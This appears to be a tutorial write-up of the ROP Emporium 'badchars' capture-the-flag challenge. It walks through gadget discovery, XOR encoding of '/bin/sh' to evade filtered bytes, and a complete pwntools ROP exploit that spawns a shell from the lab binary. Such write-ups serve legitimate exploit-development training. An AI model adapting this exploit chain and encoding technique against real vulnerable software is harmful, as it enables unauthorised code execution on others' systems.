A bad character is an unwanted character that can be used to break shellcode. Depending on the application and the developer logic there is a different set of bad characters that a developer can specify for every program. Let’s see one of the possible ways that can be used to escape those bad characters and own a root shell.
In exploit development, you frequently come across bad characters and you usually deal with them with the help of various encoders. After all, badchars are the reason that encoders such as shikata-ga-nai exist.
So, to demonstrate how to deal with badchars, I’ve picked up a challenge from ropemporium. You can download the challenge from here.
So after extracting the downloaded zip, we have 2 files.

Running ‘file badchars’ confirms that the ELF is 64-bit.
So let’s execute the ELF and see what it’s got.

The output wasn’t different in any case, so we’ll have to figure out another way.
One thing I’d like to mention here is that I will be switching between gdb and r2 from time to time, reason being some of the tasks using one tool can be way more simpler as compared to the other tool. Thus, I’ll suggest that it would be more intuitive if you go through some basic tutorials for these tools which I’ve attached as hyperlinks in the keywords.
Let’s just have a look at the functions that are present in the ELF.

The first thing which I notice is usefulGadgets, maybe it has something that I need in order to deal with badchars.
Let’s disassemble this function.

It contains xor BYTE PTR [r15],r14b which is interesting and I’ll come to that as well in the later section. Let’s just make a note of it and move forward to other functions.
After disassembling usefulFunction,

What I notice here is that, we need to call system at 0x4006f0.
This means I’ll have to figure out a way where I can write my string, and call system@plt using the written string as the argument to achieve something.
Now, I’ll use r2 to fuzz gather some more information contained in this ELF because I think I might find something more than just the address for system@plt in the usefulFunction.
On disassembling the function in radare2,

Let’s just zoom into this picture,

There is a string that is getting pushed which is ‘/bin/sh’. Now if you’re unaware about ‘/bin/sh’, according to an answer on an online forum, “/bin/sh is an executable representing the system shell. Actually, it is usually implemented as a symbolic link pointing to the executable for whichever shell is the system shell.”
But then again, we’re not allowed to simply write the string into the binary because there is a checks for badchars when you pass a string argument which can be seen here.
gdb-peda$ pdis pwnme

One of the ways to avoid Badchars is by encoding the payload using XOR operation because if you remember we have an option to pass XOR-ed string. More or less, the idea here is to encode the payload before sending it and then decode it after it is written in the memory.
Because, we saw in usefulGadget disassembly that the 3rd instruction was a mov using QWORD, so we’ll have to make it a 8 byte string so that the XOR operation can have a 64 bit address and it completely fits in QWORD. Thus, let’s make it /bin/sh\x00.
‘\x00’ is just a null character but this will help us get a 8 byte string.
What I have in mind is that, I’ll create a python script which will XOR each character from “/bin/sh\x00” string with a value (start from 0x00 and will increase by 1 if the result is in BadChars list) and then save what value it’s being XOR-ed with.
First, let’s find the RIP offset using gdb.


So here, as we can see the RSP is at offset 32 which means the RIP will be 8 bytes ahead of RIP: 32 + 8 = 40.
Okay, so now we have the RIP offset to be 40
One more tool, I’d like to introduce here is objdump which will help us find the content of all section headers present in the ELF. We will use the command,
objdump -h badchars

As you can see, most of the sections have a read-only but coming down you see that there are some section headers that are writable as well. I like using .data
The .data section is writable. According to Wikipedia, “The data segment (also known as .data) is read-write, since the values of variables can be altered at run time”.
With this gadget 0x0000000000400b30 <+0>: xor BYTE PTR [r15],r14b we can XOR any value from memory with byte provided in r14 register. So we can easily brute force a pair – printable character that will go into our string as substitute, some byte that XORed together will produce a letter that should be in a string, but is restricted.
badchars = [0x62, 0x69, 0x63, 0x2f, 0x20, 0x66, 0x6e, 0x73]
This is what the badchars are so in case, if we encode any character with XOR and it lies in this list, that means, we’ll have to find another character that XOR-ed with a substring gives the same character is an encoded format which is not in the list.
Now, I know the above statement may sound quite strange, but think of it like this – if I just create a simple function which will give me all the combinations that when XOR-ed together give me a specific character. Let’s see it for maybe character “p”.
The program for this would be as follows –

Now, this shows you 10 different combinations which when XOR-ed together will give you ‘p’ as the resultant character.
To encode ‘/bin/sh\x00’, we’ll use a combination which doesn’t have a string in the badchars list. So if we have play, we can substitute s for p and then xor that place at memory with 3, producing what we want, letter p.
The below section is just initializing the variables, string, badchars array, .data section address (which is 0x601070, but we’ll write 4 bytes after that i.e 0x601074 because 4 bytes will be consumed by libc [system@plt] call).
junk = “A” * 40
shell_string = “/bin/sh\x00”
encoded_shell_string = “”
badchars = [0x62, 0x69, 0x63, 0x2f, 0x20, 0x66, 0x6e, 0x73]
xored_value = [0x0]*8 # XOR valued array
position = 0
data_section_addr = 0x601074 # Address for the .data section
What this section does, is create an encoded string using XOR and in case there’s a badchar, just replace in the next substring of the combination and then save what value it’s being XOR-ed with.
# Encode the string using XOR
for i in shell_string:
encoded = ord(i) ^ xored_value[position]
while encoded in badchars:
xored_value[position] += 1
encoded = ord(i) ^ xored_value[position]
encoded_shell_string += chr(encoded)
position += 1
Now, is where the fun part begins. Now we wil make use of the ropgadgets that are present within the ELF and use certain registers to temporarily hold our values so that we can perform push / pop operations in the stack with the help of those registers.
ROPgadget --binary badchars --only "mov|pop|ret"
This command will list all the gadgets or sequence of instructions to perform certain operations.

Pop registers r13 to hold the .data section address and r12 to hold the XOR’ed target string, this gadget pop r12; pop r13; ret is present at address 0x0000000000400b3b.
And when the time comes to decode the string, we’ll need a combination again to pop it and store the decoded string temporarily.
Let’s us the next register combination which pop r14 ; pop r15 ; ret at address 0x0000000000400b40.
So in a nutshell, what we are going to do here is:
- Pop registers r13 and r12 to hold the .data address and the XOR’ed target string respectively.
- Write (mov) the string held by r12 to the .data section address held by r13.
- Pop the XOR-ed string and decode (XOR) it.
- Pop rdi (first parameter to system) to hold the location of the target string in the .data section.
- Call system which will have the location of target string which is ‘/bin/sh\x00’.
The script for writing the encoded string to .data section using pop r12; pop13; ret is
rop = p64(0x0000000000400b3b) # pop r12; pop r13; ret
rop += encoded_shell_string
rop += p64(data_section_addr) # Address of.data section
rop += p64(0x0000000000400b34) # mov qword ptr [r13], r12 ; ret
The script for decoding the string:
temp = data_section_addr
for i in range (0,8):
rop += p64(0x0000000000400b40) # pop r14 ; pop r15 ; ret
rop += p64(xored_value[i]) # the xored_value
rop += p64(temp) # Address of .data section
rop += p64(0x0000000000400b30) # xor byte ptr [r15],r14b; ret
temp += 1 # Move 1 byte
The final step is to pop the rdi, to hold the location of the string in .data section.
rop += p64(0x0000000000400b39) # pop rdi; ret
system_call_addr = p64(0x4006f0)
p = process(“./badchars”)
payload = junk + rop + p64(data_addr) + system_call_addr
p.sendlineafter(“s\n> “, payload)
p.interactive()
So, if I club everything together, the final exploit will be:
#!/usr/bin/python
import sys
from pwn import *
junk = "A" * 40
shell_string = "/bin/sh\x00"
encoded_shell_string = ""
badchars = [0x62, 0x69, 0x63, 0x2f, 0x20, 0x66, 0x6e, 0x73]
xored_value = [0x0]*8 #XOR valued array
position = 0
data_section_addr = 0x601074 #Address for the .data section
# Encode the string using XOR
for i in shell_string:
encoded = ord(i) ^ xored_value[position]
while encoded in badchars:
xored_value[position] += 1
encoded = ord(i) ^ xored_value[position]
encoded_shell_string += chr(encoded)
position += 1
rop = p64(0x0000000000400b3b) # pop r12; pop r13; ret
rop += encoded_shell_string
rop += p64(data_section_addr) # Address of.data section
rop += p64(0x0000000000400b34) # mov qword ptr [r13], r12 ; ret
temp = data_section_addr
for i in range (0,8):
rop += p64(0x0000000000400b40) # pop r14 ; pop r15 ; ret
rop += p64(xored_value[i]) # the xored_value
rop += p64(temp) # Address of .data section
rop += p64(0x0000000000400b30) # xor byte ptr [r15],r14b; ret
temp += 1 # Move 1 byte
rop += p64(0x0000000000400b39) # pop rdi; ret
system_call_addr = p64(0x4006f0)
p = process("./badchars")
payload = junk + rop + p64(data_section_addr) + system_call_addr
p.sendlineafter("s\n> ", payload)
p.interactive()
If you run this exploit, it will look something like the image below.

This confirms that by bypassing all the badchars, still we were able to pass the /bin/sh\x00 in the system_call (ret2libc) and get a shell.
Exploit development and reverse engineering requires a lot of knowledge spread across a number of subjects and is specific to hardware architecture. After reading this, chances are that some things might be unclear and that is completely fine. What I’ll suggest you in that case is where ever you feel stuck, just read about that concept, see how it’s implemented and then come back again to this problem.
If you have any queries, don’t hesitate to drop me a message at https://twitter.com/0xINT3
Thanks for reading!
Comments
Loading…